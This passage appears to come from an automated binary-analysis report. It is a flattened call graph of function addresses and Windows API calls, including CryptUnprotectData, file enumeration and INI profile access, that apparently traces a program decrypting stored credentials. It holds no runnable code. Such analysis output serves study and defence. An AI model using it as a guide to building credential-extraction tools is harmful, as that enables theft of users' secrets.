405313 39179->39180 39181 40b273 27 API calls 39180->39181 39181->39182 39182->39048 39184 40b58d 27 API calls 39183->39184 39185 40b18c 39184->39185 39185->39163 39187 40440c FreeLibrary 39186->39187 39188 40436d 39187->39188 39189 40a804 8 API calls 39188->39189 39190 404377 39189->39190 39191 4043f7 39190->39191 39192 40b273 27 API calls 39190->39192 39191->38630 39191->38632 39193 40438d 39192->39193 39194 40b273 27 API calls 39193->39194 39195 4043a7 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4043ba 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4043ce 39198->39199 39200 40b273 27 API calls 39199->39200 39201 4043e2 39200->39201 39201->39191 39202 40440c FreeLibrary 39201->39202 39202->39191 39204 404413 FreeLibrary 39203->39204 39205 40441e 39203->39205 39204->39205 39205->38643 39206->38640 39208 40447e 39207->39208 39209 40442e 39207->39209 39210 404485 CryptUnprotectData 39208->39210 39211 40449c 39208->39211 39212 40b2cc 27 API calls 39209->39212 39210->39211 39211->38640 39213 404438 39212->39213 39214 40a804 8 API calls 39213->39214 39215 40443e 39214->39215 39216 40444f 39215->39216 39217 40b273 27 API calls 39215->39217 39216->39208 39218 404475 FreeLibrary 39216->39218 39217->39216 39218->39208 39220 4135f6 39219->39220 39221 4135eb FreeLibrary 39219->39221 39220->38646 39221->39220 39223 4449c4 39222->39223 39241 444a48 39222->39241 39224 40b2cc 27 API calls 39223->39224 39225 4449cb 39224->39225 39226 40a804 8 API calls 39225->39226 39227 4449d1 39226->39227 39228 40b273 27 API calls 39227->39228 39229 4449dc 39228->39229 39241->38666 39241->38667 39242->38672 39243->38672 39244->38672 39245->38672 39246->38668 39248 403a29 39247->39248 39262 403bed memset memset 39248->39262 39250 403ae7 39275 40b1ab free free 39250->39275 39251 403a3f memset 39255 403a2f 39251->39255 39253 403aef 39253->38685 39254 409d1f 6 API calls 39254->39255 39255->39250 39255->39251 39255->39254 39256 409b98 GetFileAttributesW 39255->39256 39257 40a8d0 7 API calls 39255->39257 39256->39255 39257->39255 39259 40a051 GetFileTime CloseHandle 39258->39259 39260 4039ca CompareFileTime 39258->39260 39259->39260 39260->38685 39261->38684 39263 414c2e 16 API calls 39262->39263 39264 403c38 39263->39264 39265 409719 2 API calls 39264->39265 39266 403c3f wcscat 39265->39266 39267 414c2e 16 API calls 39266->39267 39268 403c61 39267->39268 39269 409719 2 API calls 39268->39269 39270 403c68 wcscat 39269->39270 39276 403af5 39270->39276 39273 403af5 20 API calls 39274 403c95 39273->39274 39274->39255 39275->39253 39277 403b02 39276->39277 39278 40ae18 9 API calls 39277->39278 39287 403b37 39278->39287 39279 403bdb 39281 40aebe FindClose 39279->39281 39280 40add4 wcscmp wcscmp 39280->39287 39282 403be6 39281->39282 39282->39273 39283 40a8d0 7 API calls 39283->39287 39284 40ae18 9 API calls 39284->39287 39285 40ae51 9 API calls 39285->39287 39286 40aebe FindClose 39286->39287 39287->39279 39287->39280 39287->39283 39287->39284 39287->39285 39287->39286 39289 409d1f 6 API calls 39288->39289 39290 404190 39289->39290 39303 409b98 GetFileAttributesW 39290->39303 39292 40419c 39293 4041a7 6 API calls 39292->39293 39294 40435c 39292->39294 39295 40424f 39293->39295 39294->38711 39295->39294 39297 40425e memset 39295->39297 39299 409d1f 6 API calls 39295->39299 39300 40a8ab 9 API calls 39295->39300 39304 414842 39295->39304 39297->39295 39298 404296 wcscpy 39297->39298 39298->39295 39299->39295 39301 4042b6 memset memset _snwprintf wcscpy 39300->39301 39301->39295 39302->38709 39303->39292 39307 41443e 39304->39307 39306 414866 39306->39295 39308 41444b 39307->39308 39309 414451 39308->39309 39310 4144a3 GetPrivateProfileStringW 39308->39310 39311 414491 39309->39311 39312 414455 wcschr 39309->39312 39310->39306 39314 414495 WritePrivateProfileStringW 39311->39314 39312->39311 39313 414463 _snwprintf 39312->39313 39313->39314 39314->39306 39315->38715 39317 40b2cc 27 API calls 39316->39317 39318 409615 39317->39318 39319 409d1f 6 API calls 39318->39319 39320 409625 39319->39320 39343 409b98 GetFileAttributesW 39320->39343 39322 409634 39323 409648 39322->39323 39360 4091b8 238 API calls 39322->39360 39325 40b2cc 27 API calls 39323->39325 39327 408801 39323->39327 39326 40965d 39325->39326 39328 409d1f 6 API calls 39326->39328 39327->38718 39327->38750 39329 40966d 39328->39329 39344 409b98 GetFileAttributesW 39329->39344 39331 40967c 39331->39327 39345 409529 39331->39345 39343->39322 39344->39331 39361 4096c3 CreateFileW 39345->39361 39347 409543 39348 4095cd 39347->39348 39349 409550 GetFileSize 39347->39349 39348->39327 39350 409577 CloseHandle 39349->39350 39351 40955f 39349->39351 39350->39348 39356 409585 39350->39356 39352 40afcf 2 API calls 39351->39352 39353 409569 39352->39353 39362 40a2ef ReadFile 39353->39362 39355 409574 39355->39350 39356->39348 39357 4095c3 39356->39357 39363 408b8d 38 API calls 39356->39363 39364 40908b 55 API calls 39357->39364 39360->39323 39361->39347 39362->39355 39363->39356 39364->39348 39392 413f4f 39365->39392 39368 413f37 K32GetModuleFileNameExW 39369 413f4a 39368->39369 39369->38779 39371 413969 wcscpy 39370->39371 39372 41396c wcschr 39370->39372 39384 413a3a 39371->39384 39372->39371 39374 41398e 39372->39374 39396 4097f7 wcslen wcslen _memicmp 39374->39396 39376 41399a 39377 4139a4 memset 39376->39377 39378 4139e6 39376->39378 39397 409dd5 GetWindowsDirectoryW wcscpy 39377->39397 39380 413a31 wcscpy 39378->39380 39381 4139ec memset 39378->39381 39380->39384 39398 409dd5 GetWindowsDirectoryW wcscpy 39381->39398 39382 4139c9 wcscpy wcscat 39382->39384 39384->38779 39385 413a11 memcpy wcscat 39385->39384 39387 413cb0 GetModuleHandleW 39386->39387 39388 413cda 39386->39388 39387->39388 39389 413cbf 39387->39389 39390 413ce3 GetProcessTimes 39388->39390 39391 413cf6 39388->39391 39389->39388 39390->38781 39391->38781 39393 413f54 39392->39393 39395 413f2f 39392->39395 39394 40a804 8 API calls 39393->39394 39394->39395 39395->39368 39395->39369 39396->39376 39397->39382 39398->39385 39399->38801 39400->38824 39402 409cf9 GetVersionExW 39401->39402 39403 409d0a 39401->39403 39402->39403 39403->38831 39403->38835 39404->38838 39405->38841 39406->38843 39407->38888 39409 40bba5 39408->39409 39524 40cc26 39409->39524 39412 40bd4b 39545 40cc0c 39412->39545 39417 40b2cc 27 API calls 39418 40bbef 39417->39418 39552 40ccf0 _wcsicmp 39418->39552 39420 40bbf5 39420->39412 39553 40ccb4 6 API calls 39420->39553 39422 40bc26 39423 40cf04 17 API calls 39422->39423 39424 40bc2e 39423->39424 39425 40bd43 39424->39425 39426 40b2cc 27 API calls 39424->39426 39427 40cc0c 4 API calls 39425->39427 39428 40bc40 39426->39428 39427->39412 39554 40ccf0 _wcsicmp 39428->39554 39430 40bc46 39430->39425 39431 40bc61 memset memset WideCharToMultiByte 39430->39431 39555 40103c strlen 39431->39555 39433 40bcc0 39434 40b273 27 API calls 39433->39434 39435 40bcd0 memcmp 39434->39435 39435->39425 39436 40bce2 39435->39436 39437 404423 37 API calls 39436->39437 39438 40bd10 39437->39438 39438->39425 39439 40bd3a LocalFree 39438->39439 39440 40bd1f memcpy 39438->39440 39439->39425 39440->39439 39441->38903 39443 4438b5 11 API calls 39442->39443 39444 44444c 39443->39444 39445 40b879 39444->39445 39615 415a6d 39444->39615 39445->38906 39445->38907 39447 4442e6 11 API calls 39449 44469e 39447->39449 39448 444486 39450 4444b9 memcpy 39448->39450 39487 4444a4 39448->39487 39449->39445 39689 443d90 110 API calls 39449->39689 39619 415258 39450->39619 39453 444524 39454 444541 39453->39454 39455 44452a 39453->39455 39622 444316 39454->39622 39456 416935 16 API calls 39455->39456 39456->39487 39459 444316 18 API calls 39460 444563 39459->39460 39461 444316 18 API calls 39460->39461 39462 44456f 39461->39462 39463 444316 18 API calls 39462->39463 39464 44457f 39463->39464 39464->39487 39636 432d4e 39464->39636 39467 444316 18 API calls 39468 4445b0 39467->39468 39640 41eed2 39468->39640 39470 4445cf 39471 4445d6 39470->39471 39472 4445ee 39470->39472 39475 416935 16 API calls 39471->39475 39656 43302c 39472->39656 39475->39487 39476 43302c memset 39477 444609 39476->39477 39477->39487 39662 416935 39477->39662 39487->39447 39752 438460 39488->39752 39490 40b8a4 39490->38913 39494 4251c4 39490->39494 39492 409a74 GetTempFileNameW 39491->39492 39493 409a66 GetWindowsDirectoryW 39491->39493 39492->38900 39493->39492 39840 424f07 39494->39840 39496 4251e4 39497 4251f7 39496->39497 39498 4251e8 39496->39498 39848 4250f8 39497->39848 39847 4446ea 11 API calls 39498->39847 39500 4251f2 39500->38938 39502 425209 39505 425249 39502->39505 39508 4250f8 126 API calls 39502->39508 39509 425287 39502->39509 39856 4384e9 134 API calls 39502->39856 39857 424f74 123 API calls 39502->39857 39503 415c7d 16 API calls 39503->39500 39505->39509 39858 424ff0 13 API calls 39505->39858 39508->39502 39509->39503 39510 425266 39510->39509 39859 415be9 memcpy 39510->39859 39512->38938 39513->38938 39514->38938 39515->38938 39516->38938 39517->38938 39518->38938 39519->38938 39520->38938 39521->38913 39522->38906 39523->38935 39556 4096c3 CreateFileW 39524->39556 39526 40cc34 39527 40cc3d GetFileSize 39526->39527 39528 40bbca 39526->39528 39529 40afcf 2 API calls 39527->39529 39528->39412 39536 40cf04 39528->39536 39530 40cc64 39529->39530 39557 40a2ef ReadFile 39530->39557 39532 40cc71 39558 40ab4a MultiByteToWideChar 39532->39558 39534 40cc95 CloseHandle 39535 40b04b ??3@YAXPAX 39534->39535 39535->39528 39537 40b633 free 39536->39537 39538 40cf14 39537->39538 39564 40b1ab free free 39538->39564 39540 40bbdd 39540->39412 39540->39417 39541 40cf1b 39541->39540 39543 40cfef 39541->39543 39565 40cd4b 39541->39565 39544 40cd4b 14 API calls 39543->39544 39544->39540 39546 40b633 free 39545->39546 39547 40cc15 39546->39547 39548 40aa04 free 39547->39548 39549 40cc1d 39548->39549 39614 40b1ab free free 39549->39614 39551 40b7d4 memset CreateFileW 39551->38893 39551->38894 39552->39420 39553->39422 39554->39430 39555->39433 39556->39526 39557->39532 39559 40ab93 39558->39559 39560 40ab6b 39558->39560 39559->39534 39561 40a9ce 4 API calls 39560->39561 39562 40ab74 39561->39562 39563 40ab7c MultiByteToWideChar 39562->39563 39563->39559 39564->39541 39566 40cd7b 39565->39566 39599 40aa29 39566->39599 39568 40cef5 39569 40aa04 free 39568->39569 39570 40cefd 39569->39570 39570->39541 39572 40aa29 6 API calls 39573 40ce1d 39572->39573 39574 40aa29 6 API calls 39573->39574 39575 40ce3e 39574->39575 39576 40ce6a 39575->39576 39607 40abb7 wcslen memmove 39575->39607 39577 40ce9f 39576->39577 39610 40abb7 wcslen memmove 39576->39610 39580 40a8d0 7 API calls 39577->39580 39583 40ceb5 39580->39583 39581 40ce56 39608 40aa71 wcslen 39581->39608 39582 40ce8b 39611 40aa71 wcslen 39582->39611 39589 40a8d0 7 API calls 39583->39589 39586 40ce5e 39609 40abb7 wcslen memmove 39586->39609 39587 40ce93 39612 40abb7 wcslen memmove 39587->39612 39591 40cecb 39589->39591 39613 40d00b malloc memcpy free free 39591->39613 39593 40cedd 39594 40aa04 free 39593->39594 39595 40cee5 39594->39595 39596 40aa04 free 39595->39596 39597 40ceed 39596->39597 39598 40aa04 free 39597->39598 39598->39568 39600 40aa33 39599->39600 39606 40aa63 39599->39606 39601 40aa44 39600->39601 39602 40aa38 wcslen 39600->39602 39603 40a9ce malloc memcpy free free 39601->39603 39602->39601 39604 40aa4d 39603->39604 39605 40aa51 memcpy 39604->39605 39604->39606 39605->39606 39606->39568 39606->39572 39607->39581 39608->39586 39609->39576 39610->39582 39611->39587 39612->39577 39613->39593 39614->39551 39616 415a77 39615->39616 39617 415a8d 39616->39617 39618 415a7e memset 39616->39618 39617->39448 39618->39617 39620 4438b5 11 API calls 39619->39620 39621 41525d 39620->39621 39621->39453 39623 444328 39622->39623 39624 444423 39623->39624 39625 44434e 39623->39625 39690 4446ea 11 API calls 39624->39690 39626 432d4e 3 API calls 39625->39626 39628 44435a 39626->39628 39630 444375 39628->39630 39635 44438b 39628->39635 39629 432d4e 3 API calls 39631 4443ec 39629->39631 39632 416935 16 API calls 39630->39632 39633 444381 39631->39633 39634 416935 16 API calls 39631->39634 39632->39633 39633->39459 39634->39633 39635->39629 39637 432d58 39636->39637 39639 432d65 39636->39639 39691 432cc4 memset memset memcpy 39637->39691 39639->39467 39641 41eee2 39640->39641 39642 415a6d memset 39641->39642 39643 41ef23 39642->39643 39644 415a6d memset 39643->39644 39655 41ef2d 39643->39655 39645 41ef42 39644->39645 39649 41ef49 39645->39649 39692 41b7d9 39645->39692 39647 41ef66 39648 41ef74 memset 39647->39648 39647->39649 39650 41ef91 39648->39650 39653 41ef9e 39648->39653 39649->39655 39707 41b321 100 API calls 39649->39707 39652 41519d 6 API calls 39650->39652 39652->39653 39653->39649 39706 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39653->39706 39655->39470 39657 433033 39656->39657 39658 433042 39656->39658 39713 421f20 memset 39657->39713 39714 415a91 39658->39714 39661 43303f 39661->39476 39689->39445 39690->39633 39691->39639 39698 41b812 39692->39698 39693 415a6d memset 39694 41b8c2 39693->39694 39695 41b980 39694->39695 39696 41b902 memcpy memcpy memcpy memcpy memcpy 39694->39696 39701 41b849 39694->39701 39703 41b9ad 39695->39703 39709 4151e3 39695->39709 39696->39695 39698->39701 39705 41b884 39698->39705 39708 444706 11 API calls 39698->39708 39701->39647 39703->39701 39712 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39703->39712 39705->39693 39705->39701 39706->39649 39707->39655 39708->39705 39713->39661 39715 415a9d 39714->39715 39716 415ab3 39715->39716 39717 415aa4 memset 39715->39717 39716->39661 39717->39716 39764 41703f 39752->39764 39754 43847a 39755 43848a 39754->39755 39756 43847e 39754->39756 39771 438270 39755->39771 39801 4446ea 11 API calls 39756->39801 39761 4384bb 39762 438270 133 API calls 39761->39762 39763 438488 39762->39763 39763->39490 39765 417044 39764->39765 39766 41705c 39764->39766 39770 417055 39765->39770 39803 416760 11 API calls 39765->39803 39767 417075 39766->39767 39804 41707a 11 API calls 39766->39804 39767->39754 39770->39754 39772 415a91 memset 39771->39772 39773 43828d 39772->39773 39774 438297 39773->39774 39775 438341 39773->39775 39777 4382d6 39773->39777 39776 415c7d 16 API calls 39774->39776 39805 44358f 39775->39805 39779 438458 39776->39779 39780 4382fb 39777->39780 39781 4382db 39777->39781 39779->39763 39802 424f26 122 API calls 39779->39802 39836 415c23 memcpy 39780->39836 39782 416935 16 API calls 39781->39782 39784 4382e9 39782->39784 39786 415c7d 16 API calls 39784->39786 39785 438305 39788 44358f 19 API calls 39785->39788 39790 438318 39785->39790 39786->39774 39787 438373 39794 438383 39787->39794 39837 4300e8 memset memset memcpy 39787->39837 39788->39790 39790->39787 39831 43819e 39790->39831 39792 4383f5 39797 438404 39792->39797 39798 43841c 39792->39798 39793 4383cd 39793->39792 39839 42453e 122 API calls 39793->39839 39794->39793 39838 415c23 memcpy 39794->39838 39800 416935 16 API calls 39797->39800 39799 416935 16 API calls 39798->39799 39799->39774 39800->39774 39801->39763 39802->39761 39803->39770 39804->39765 39806 4435be 39805->39806 39808 443676 39806->39808 39811 4436ce 39806->39811 39814 442ff8 19 API calls 39806->39814 39815 44366c 39806->39815 39829 44360c 39806->39829 39807 443758 39810 441409 memset 39807->39810 39819 443775 39807->39819 39808->39807 39809 443737 39808->39809 39812 442ff8 19 API calls 39808->39812 39813 442ff8 19 API calls 39809->39813 39810->39807 39817 4165ff 11 API calls 39811->39817 39812->39809 39813->39807 39814->39806 39818 4169a7 11 API calls 39815->39818 39816 4437be 39820 416760 11 API calls 39816->39820 39821 4437de 39816->39821 39817->39808 39818->39808 39819->39816 39825 415c56 11 API calls 39819->39825 39820->39821 39822 42463b memset memcpy 39821->39822 39824 443801 39821->39824 39822->39824 39823 443826 39827 43bd08 memset 39823->39827 39824->39823 39826 43024d memset 39824->39826 39825->39816 39826->39823 39828 443837 39827->39828 39828->39829 39830 43024d memset 39828->39830 39829->39790 39830->39828 39832 438246 39831->39832 39834 4381ba 39831->39834 39832->39787 39833 41f432 109 API calls 39833->39834 39834->39832 39834->39833 39835 41f638 103 API calls 39834->39835 39835->39834 39836->39785 39837->39794 39838->39793 39839->39792 39841 424f1f 39840->39841 39842 424f0c 39840->39842 39861 424eea 11 API calls 39841->39861 39860 416760 11 API calls 39842->39860 39845 424f18 39845->39496 39846 424f24 39846->39496 39847->39500 39849 425108 39848->39849 39855 42510d 39848->39855 39894 424f74 123 API calls 39849->39894 39852 42516e 39854 415c7d 16 API calls 39852->39854 39853 425115 39853->39502 39854->39853 39855->39853 39862 42569b 39855->39862 39856->39502 39857->39502 39858->39510 39859->39509 39860->39845 39861->39846 39872 4256f1 39862->39872 39890 4259c2 39862->39890 39867 4260dd 39906 424251 119 API calls 39867->39906 39868 429a4d 39875 429a66 39868->39875 39876 429a9b 39868->39876 39872->39868 39873 422aeb memset memcpy memcpy 39872->39873 39878 4260a1 39872->39878 39887 4259da 39872->39887 39888 429ac1 39872->39888 39872->39890 39893 425a38 39872->39893 39895 4227f0 memset memcpy 39872->39895 39896 422b84 15 API calls 39872->39896 39897 422b5d memset memcpy memcpy 39872->39897 39898 422640 13 API calls 39872->39898 39900 4241fc 11 API calls 39872->39900 39901 42413a 89 API calls 39872->39901 39873->39872 39907 415c56 11 API calls 39875->39907 39877 429a96 39876->39877 39909 416760 11 API calls 39876->39909 39910 424251 119 API calls 39877->39910 39904 415c56 11 API calls 39878->39904 39880 429a7a 39908 416760 11 API calls 39880->39908 39905 416760 11 API calls 39887->39905 39889 425ad6 39888->39889 39911 415c56 11 API calls 39888->39911 39889->39852 39890->39889 39899 415c56 11 API calls 39890->39899 39893->39890 39902 422640 13 API calls 39893->39902 39903 4226e0 12 API calls 39893->39903 39894->39855 39895->39872 39896->39872 39897->39872 39898->39872 39899->39887 39900->39872 39901->39872 39902->39893 39903->39893 39904->39887 39905->39867 39906->39889 39907->39880 39908->39877 39909->39877 39910->39888 39911->39887 39912->38973 39913->38981 39923 44def7 39924 44df07 39923->39924 39925 44df00 ??3@YAXPAX 39923->39925 39926 44df17 39924->39926 39927 44df10 ??3@YAXPAX 39924->39927 39925->39924 39928 44df27 39926->39928 39929 44df20 ??3@YAXPAX 39926->39929 39927->39926 39930 44df37 39928->39930 39931 44df30 ??3@YAXPAX 39928->39931 39929->39928 39931->39930 37717 44dea5 37718 44deb5 FreeLibrary 37717->37718 37719 44dec3 37717->37719 37718->37719 39932 4148b6 FindResourceW 39933 4148f9 39932->39933 39934 4148cf SizeofResource 39932->39934 39934->39933 39935 4148e0 LoadResource 39934->39935 39935->39933 39936 4148ee LockResource 39935->39936 39936->39933 39937 441b3f 39947 43a9f6 39937->39947 39939 441b61 40120 4386af memset 39939->40120 39941 44189a 39942 4418e2 39941->39942 39944 442bd4 39941->39944 39943 4418ea 39942->39943 40121 4414a9 12 API calls 39942->40121 39944->39943 40122 441409 memset 39944->40122 39948 43aa20 39947->39948 39955 43aadf 39947->39955 39949 43aa34 memset 39948->39949 39948->39955 39950 43aa56 39949->39950 39951 43aa4d 39949->39951 40123 43a6e7 39950->40123 40131 42c02e memset 39951->40131 39955->39939 39957 43aad3 40133 4169a7 11 API calls 39957->40133 39958 43aaae 39958->39955 39958->39957 39973 43aae5 39958->39973 39959 43ac18 39962 43ac47 39959->39962 40135 42bbd5 memcpy memcpy memcpy memset memcpy 39959->40135 39963 43aca8 39962->39963 40136 438eed 16 API calls 39962->40136 39967 43acd5 39963->39967 40138 4233ae 11 API calls 39963->40138 39966 43ac87 40137 4233c5 16 API calls 39966->40137 40139 423426 11 API calls 39967->40139 39971 43ace1 40140 439811 162 API calls 39971->40140 39972 43a9f6 160 API calls 39972->39973 39973->39955 39973->39959 39973->39972 40134 439bbb 22 API calls 39973->40134 39975 43acfd 39980 43ad2c 39975->39980 40141 438eed 16 API calls 39975->40141 39977 43ad19 40142 4233c5 16 API calls 39977->40142 39979 43ad58 40143 44081d 162 API calls 39979->40143 39980->39979 39983 43add9 39980->39983 39983->39983 40147 423426 11 API calls 39983->40147 39984 43ae3a memset 39985 43ae73 39984->39985 40148 42e1c0 146 API calls 39985->40148 39986 43adab 40145 438c4e 162 API calls 39986->40145 39987 43ad6c 39987->39955 39987->39986 40144 42370b memset memcpy memset 39987->40144 39991 43adcc 40146 440f84 12 API calls 39991->40146 39992 43ae96 40149 42e1c0 146 API calls 39992->40149 39995 43aea8 39998 43aec1 39995->39998 40150 42e199 146 API calls 39995->40150 39997 43af00 39997->39955 40002 43af1a 39997->40002 40003 43b3d9 39997->40003 39998->39997 40151 42e1c0 146 API calls 39998->40151 39999 43add4 40004 43b60f 39999->40004 40210 438f86 16 API calls 39999->40210 40152 438eed 16 API calls 40002->40152 40008 43b3f6 40003->40008 40013 43b4c8 40003->40013 40004->39955 40211 4393a5 17 API calls 40004->40211 40007 43af2f 40153 4233c5 16 API calls 40007->40153 40193 432878 12 API calls 40008->40193 40010 43af51 40154 423426 11 API calls 40010->40154 40012 43b4f2 40200 43a76c 21 API calls 40012->40200 40013->40012 40199 42bbd5 memcpy memcpy memcpy memset memcpy 40013->40199 40015 43af7d 40155 423426 11 API calls 40015->40155 40019 43af94 40156 423330 11 API calls 40019->40156 40020 43b529 40201 44081d 162 API calls 40020->40201 40021 43b462 40195 423330 11 API calls 40021->40195 40025 43b544 40029 43b55c 40025->40029 40202 42c02e memset 40025->40202 40026 43b428 40026->40021 40194 432b60 16 API calls 40026->40194 40027 43afca 40157 423330 11 API calls 40027->40157 40028 43b47e 40031 43b497 40028->40031 40196 42374a memcpy memset memcpy memcpy memcpy 40028->40196 40203 43a87a 162 API calls 40029->40203 40197 4233ae 11 API calls 40031->40197 40034 43afdb 40158 4233ae 11 API calls 40034->40158 40037 43b4b1 40198 423399 11 API calls 40037->40198 40039 43b56c 40042 43b58a 40039->40042 40204 423330 11 API calls 40039->40204 40041 43afee 40159 44081d 162 API calls 40041->40159 40205 440f84 12 API calls 40042->40205 40043 43b4c1 40207 42db80 162 API calls 40043->40207 40048 43b592 40206 43a82f 16 API calls 40048->40206 40051 43b5b4 40208 438c4e 162 API calls 40051->40208 40053 43b5cf 40209 42c02e memset 40053->40209 40055 43b005 40055->39955 40060 43b01f 40055->40060 40160 42d836 162 API calls 40055->40160 40056 43b1ef 40170 4233c5 16 API calls 40056->40170 40058 43b212 40171 423330 11 API calls 40058->40171 40060->40056 40168 423330 11 API calls 40060->40168 40169 42d71d 162 API calls 40060->40169 40062 43b087 40161 4233ae 11 API calls 40062->40161 40065 43b22a 40172 42ccb5 11 API calls 40065->40172 40068 43b23f 40173 4233ae 11 API calls 40068->40173 40069 43b10f 40164 423330 11 API calls 40069->40164 40071 43b257 40174 4233ae 11 API calls 40071->40174 40075 43b129 40165 4233ae 11 API calls 40075->40165 40076 43b26e 40175 4233ae 11 API calls 40076->40175 40079 43b09a 40079->40069 40162 42cc15 19 API calls 40079->40162 40163 4233ae 11 API calls 40079->40163 40081 43b282 40176 43a87a 162 API calls 40081->40176 40082 43b13c 40166 440f84 12 API calls 40082->40166 40084 43b29d 40177 423330 11 API calls 40084->40177 40087 43b15f 40167 4233ae 11 API calls 40087->40167 40088 43b2af 40090 43b2b8 40088->40090 40091 43b2ce 40088->40091 40178 4233ae 11 API calls 40090->40178 40179 440f84 12 API calls 40091->40179 40094 43b2c9 40181 4233ae 11 API calls 40094->40181 40095 43b2da 40180 42370b memset memcpy memset 40095->40180 40098 43b2f9 40182 423330 11 API calls 40098->40182 40100 43b30b 40183 423330 11 API calls 40100->40183 40102 43b325 40184 423399 11 API calls 40102->40184 40104 43b332 40185 4233ae 11 API calls 40104->40185 40106 43b354 40186 423399 11 API calls 40106->40186 40108 43b364 40187 43a82f 16 API calls 40108->40187 40110 43b370 40188 42db80 162 API calls 40110->40188 40112 43b380 40189 438c4e 162 API calls 40112->40189 40114 43b39e 40190 423399 11 API calls 40114->40190 40116 43b3ae 40191 43a76c 21 API calls 40116->40191 40118 43b3c3 40192 423399 11 API calls 40118->40192 40120->39941 40121->39943 40122->39944 40124 43a6f5 40123->40124 40125 43a765 40123->40125 40124->40125 40212 42a115 40124->40212 40125->39955 40132 4397fd memset 40125->40132 40129 43a73d 40129->40125 40130 42a115 146 API calls 40129->40130 40130->40125 40131->39950 40132->39958 40133->39955 40134->39973 40135->39962 40136->39966 40137->39963 40138->39967 40139->39971 40140->39975 40141->39977 40142->39980 40143->39987 40144->39986 40145->39991 40146->39999 40147->39984 40148->39992 40149->39995 40150->39998 40151->39998 40152->40007 40153->40010 40154->40015 40155->40019 40156->40027 40157->40034 40158->40041 40159->40055 40160->40062 40161->40079 40162->40079 40163->40079 40164->40075 40165->40082 40166->40087 40167->40060 40168->40060 40169->40060 40170->40058 40171->40065 40172->40068 40173->40071 40174->40076 40175->40081 40176->40084 40177->40088 40178->40094 40179->40095 40180->40094 40181->40098 40182->40100 40183->40102 40184->40104 40185->40106 40186->40108 40187->40110 40188->40112 40189->40114 40190->40116 40191->40118 40192->39999 40193->40026 40194->40021 40195->40028 40196->40031 40197->40037 40198->40043 40199->40012 40200->40020 40201->40025 40202->40029 40203->40039 40204->40042 40205->40048 40206->40043 40207->40051 40208->40053 40209->39999 40210->40004 40211->39955 40213 42a175 40212->40213 40215 42a122 40212->40215 40213->40125 40218 42b13b 146 API calls 40213->40218 40215->40213 40216 42a115 146 API calls 40215->40216 40219 43a174 40215->40219 40243 42a0a8 146 API calls 40215->40243 40216->40215 40218->40129 40233 43a196 40219->40233 40234 43a19e 40219->40234 40220 43a306 40220->40233 40259 4388c4 14 API calls 40220->40259 40223 42a115 146 API calls 40223->40234 40224 415a91 memset 40224->40234 40225 43a642 40225->40233 40263 4169a7 11 API calls 40225->40263 40229 43a635 40262 42c02e memset 40229->40262 40233->40215 40234->40220 40234->40223 40234->40224 40234->40233 40244 42ff8c 40234->40244 40252 4165ff 40234->40252 40255 439504 13 API calls 40234->40255 40256 4312d0 146 API calls 40234->40256 40257 42be4c memcpy memcpy memcpy memset memcpy 40234->40257 40258 43a121 11 API calls 40234->40258 40236 42bf4c 14 API calls 40238 43a325 40236->40238 40237 4169a7 11 API calls 40237->40238 40238->40225 40238->40229 40238->40233 40238->40236 40238->40237 40239 42b5b5 memset memcpy 40238->40239 40242 4165ff 11 API calls 40238->40242 40260 42b63e 14 API calls 40238->40260 40261 42bfcf memcpy 40238->40261 40239->40238 40242->40238 40243->40215 40264 43817e 40244->40264 40246 42ff99 40247 42ffe3 40246->40247 40248 42ffd0 40246->40248 40251 42ff9d 40246->40251 40269 4169a7 11 API calls 40247->40269 40268 4169a7 11 API calls 40248->40268 40251->40234 40253 4165a0 11 API calls 40252->40253 40254 41660d 40253->40254 40254->40234 40255->40234 40256->40234 40257->40234 40258->40234 40259->40238 40260->40238 40261->40238 40262->40225 40263->40233 40265 438187 40264->40265 40267 438192 40264->40267 40270 4380f6 40265->40270 40267->40246 40268->40251 40269->40251 40272 43811f 40270->40272 40271 438164 40271->40267 40272->40271 40275 437e5e 40272->40275 40298 4300e8 memset memset memcpy 40272->40298 40299 437d3c 40275->40299 40277 437eb3 40277->40272 40278 437ea9 40278->40277 40284 437f22 40278->40284 40314 41f432 40278->40314 40281 437f06 40361 415c56 11 API calls 40281->40361 40283 437f95 40362 415c56 11 API calls 40283->40362 40285 437f7f 40284->40285 40286 432d4e 3 API calls 40284->40286 40285->40283 40287 43802b 40285->40287 40286->40285 40289 4165ff 11 API calls 40287->40289 40290 438054 40289->40290 40325 437371 40290->40325 40293 43806b 40294 438094 40293->40294 40363 42f50e 137 API calls 40293->40363 40295 437fa3 40294->40295 40364 4300e8 memset memset memcpy 40294->40364 40295->40277 40365 41f638 103 API calls 40295->40365 40298->40272 40300 437d69 40299->40300 40303 437d80 40299->40303 40366 437ccb 11 API calls 40300->40366 40302 437d76 40302->40278 40303->40302 40304 437da3 40303->40304 40307 437d90 40303->40307 40306 438460 133 API calls 40304->40306 40310 437dcb 40306->40310 40307->40302 40370 437ccb 11 API calls 40307->40370 40308 437de8 40369 424f26 122 API calls 40308->40369 40310->40308 40367 444283 13 API calls 40310->40367 40312 437dfc 40368 437ccb 11 API calls 40312->40368 40315 41f54d 40314->40315 40321 41f44f 40314->40321 40316 41f466 40315->40316 40400 41c635 memset memset 40315->40400 40316->40281 40316->40284 40321->40316 40323 41f50b 40321->40323 40371 41f1a5 40321->40371 40396 41c06f memcmp 40321->40396 40397 41f3b1 89 API calls 40321->40397 40398 41f398 85 API calls 40321->40398 40323->40315 40323->40316 40399 41c295 85 API calls 40323->40399 40326 41703f 11 API calls 40325->40326 40327 437399 40326->40327 40328 43739d 40327->40328 40331 4373ac 40327->40331 40401 4446ea 11 API calls 40328->40401 40330 4373a7 40330->40293 40332 416935 16 API calls 40331->40332 40333 4373ca 40332->40333 40334 438460 133 API calls 40333->40334 40339 4251c4 136 API calls 40333->40339 40343 415a91 memset 40333->40343 40346 43758f 40333->40346 40358 437584 40333->40358 40360 437d3c 134 API calls 40333->40360 40402 425433 13 API calls 40333->40402 40403 425413 17 API calls 40333->40403 40404 42533e 16 API calls 40333->40404 40405 42538f 16 API calls 40333->40405 40406 42453e 122 API calls 40333->40406 40334->40333 40335 4375bc 40337 415c7d 16 API calls 40335->40337 40338 4375d2 40337->40338 40338->40330 40340 4442e6 11 API calls 40338->40340 40339->40333 40341 4375e2 40340->40341 40341->40330 40409 444283 13 API calls 40341->40409 40343->40333 40407 42453e 122 API calls 40346->40407 40349 4375f4 40352 437620 40349->40352 40353 43760b 